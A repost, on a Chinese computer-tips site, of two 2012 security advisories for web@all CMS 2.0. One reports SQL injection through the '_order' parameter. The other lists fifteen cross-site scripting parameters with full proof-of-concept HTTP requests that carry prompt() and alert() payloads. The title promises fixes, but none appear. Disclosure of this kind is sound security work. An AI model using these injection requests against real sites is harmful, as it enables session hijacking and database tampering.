当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

web@all CMS 2.0多个缺陷及修复

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

web@all CMS 2.0 (_order) SQL Injection Vulnerability 
 
开发者: web@all 
 
程序官网:  
 
影响版本: 2.0 
 
  
 
Summary: web@all is a PHP content management system (CMS). If you 
 
know about it,you nearly can use it to do anything. 
 
  
 
Desc: The application suffers from an SQL Injection vulnerability. 
 
Input passed via the GET parameter '_order' is not properly sanitised 
 
before being returned to the user or used in SQL queries. This can be 
 
exploited to manipulate SQL queries by injecting arbitrary SQL code. 
 
  
 
Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 
 
           Apache 2.4.2 (Win32) 
 
           PHP 5.4.4 
 
           MySQL 5.5.25a 
 
  
 
  
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic 
 
                            @zeroscience 
 
  
 
  
 
Advisory ID: ZSL-2012-5099 
 
Advisory URL:  
 
  
 
  
 
21.08.2012 
 
  
 
--- 
 
  
 
  
 
/webatall/sys/index.php?_key=author&_order=1[SQL ATTACK QUERY]&_text[status]=-1&_type[]=0&mod=article 
 
  
 
============================================================================= 
 
  
 
web@all CMS 2.0 Multiple Remote XSS Vulnerabilities 
 
  
 
  
 
Vendor: web@all 
 
Product web page:  
 
Affected version: 2.0 
 
  
 
Summary: web@all is a PHP content management system (CMS). If you 
 
know about it,you nearly can use it to do anything. 
 
  
 
Desc: web@all CMS suffers from multiple stored and reflected cross-site 
 
scripting vulnerabilities. The issues are triggered when input passed via 
 
several parameters to several scripts is not properly sanitized before being 
 
returned to the user. This can be exploited to execute arbitrary HTML and 
 
script code in a user's browser session in context of an affected site. 
 
  
 
---------------------------------------------------------------------------- 
 
  * Parameter *          * Method *          * Module *          * Type * 
 
---------------------------------------------------------------------------- 
 
  
 
 1. act                    POST                member            Reflected 
 
 2. security               POST                member            Reflected 
 
 3. username               POST                member            Reflected 
 
 4. id                     GET                 article           Reflected 
 
 5. mod                    GET/POST            member            Reflected 
 
 6. _flag                  GET                 article           Reflected 
 
 7. _text[]                GET                 article           Reflected 
 
 8. _text[alias]           GET                 article           Reflected 
 
 9. _text[category]        GET                 article           Reflected 
 
10. _text           GET                 member            Reflected 
 
11. _text[title]           GET                 article           Reflected 
 
12. _text[username]        GET                 article           Reflected 
 
13. _text[timeadd]         GET                 member            Reflected 
 
14. title                  POST                article/cron      Stored 
 
15. description            POST                cron              Stored 
 
  
 
---------------------------------------------------------------------------- 
 
  
 
Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 
 
           Apache 2.4.2 (Win32) 
 
           PHP 5.4.4 
 
           MySQL 5.5.25a 
 
  
 
  
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic 
 
                            @zeroscience 
 
  
 
  
 
Advisory ID: ZSL-2012-5098 
 
Advisory URL:  
 
  
 
  
 
21.08.2012 
 
  
 
--- 
 
  
 
  
 
Reflected: 
 
---------- 
 
  
 
  
 
POST /webatall/sys/action.php HTTP/1.1 
 
Content-Length: 154 
 
Content-Type: application/x-www-form-urlencoded 
 
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 
 
Host: localhost:80 
 
Connection: Keep-alive 
 
Accept-Encoding: gzip,deflate 
 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) 
 
  
 
act=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28900164%29%29%3e&goto=%2fsys&mod=member&password=Password&security=1&submit=Sign%20in&username=Username 
 
  
 
  
 
POST /webatall/sys/action.php HTTP/1.1 
 
Content-Length: 154 
 
Content-Type: application/x-www-form-urlencoded 
 
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 
 
Host: localhost:80 
 
Connection: Keep-alive 
 
Accept-Encoding: gzip,deflate 
 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) 
 
  
 
act=signin&goto=%2fsys&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28920000%29%29%3e&password=Password&security=1&submit=Sign%20in&username=Username 
 
  
 
  
 
POST /webatall/sys/action.php HTTP/1.1 
 
Content-Length: 159 
 
Content-Type: application/x-www-form-urlencoded 
 
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 
 
Host: localhost:80 
 
Connection: Keep-alive 
 
Accept-Encoding: gzip,deflate 
 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) 
 
  
 
act=signin&goto=%2fsys&mod=member&password=Password&security=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28964492%29%29%3e&submit=Sign%20in&username=Username 
 
  
 
  
 
POST /webatall/sys/action.php HTTP/1.1 
 
Content-Length: 147 
 
Content-Type: application/x-www-form-urlencoded 
 
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 
 
Host: localhost:80 
 
Connection: Keep-alive 
 
Accept-Encoding: gzip,deflate 
 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) 
 
  
 
act=signin&goto=%2fsys&mod=member&password=admin&security=1&submit=Sign+in&username=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28913398%29%29%3e 
 
  
 
  
 
GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=%22%20onmouseover%3dprompt%28940245%29%20bad%3d%22&mod=article 
 
GET /webatall/sys/index.php?_text[timeadd]=1345564800&_type[timeadd]=2&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28961358%29%29%3e 
 
GET /webatall/sys/index.php?_flag=%22%20onmouseover%3dprompt%28916116%29%20bad%3d%22&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article 
 
GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=%22%20onmouseover%3dprompt%28965775%29%20bad%3d%22&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article 
 
GET /webatall/sys/index.php?_text%5balias%5d=%22%20onmouseover%3dprompt%28989568%29%20bad%3d%22&_type%5balias%5d=0&mod=article 
 
GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article 
 
GET /webatall/sys/index.php?_text%5bemail%5d=%22%20onmouseover%3dprompt%28999602%29%20bad%3d%22&_type%5bemail%5d=0&mod=member 
 
GET /webatall/sys/index.php?_text%5btitle%5d=%22%20onmouseover%3dprompt%28927731%29%20bad%3d%22&_type%5btitle%5d=0&mod=article 
 
GET /webatall/sys/index.php?_text%5busername%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_type%5busername%5d=0&mod=member 
 
GET /webatall/sys/index.php?_text[timeadd]=%22%20onmouseover%3dprompt%28929079%29%20bad%3d%22&_type[timeadd]=2&mod=member 
 
  
 
  
 
  
 
Stored: 
 
------- 
 
  
 
  
 
POST /webatall/sys/action.php HTTP/1.1 
 
  
 
act sys_add 
 
author  test 
 
category_id 1 
 
content test 
 
content_key test 
 
copyright   test 
 
files    
 
id   
 
lang     
 
menu     
 
meta_description    test 
 
meta_keywords   test 
 
mod article 
 
options test 
 
status  1 
 
thumbs  test 
 
title   "><script>alert(1);</script> 
 
  
 
  
 
  
 
POST HTTP/1.1 
 
  
 
act sys_add 
 
cron    delete_unpaid_transaction.php 
 
description "><script>alert(2);</script> 
 
id   
 
menu     
 
mod cron 
 
run_interval     
 
status  1 
 
title   "><script>alert(3);</script>
 

,www.xuhantao.com,涛涛电脑知识

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1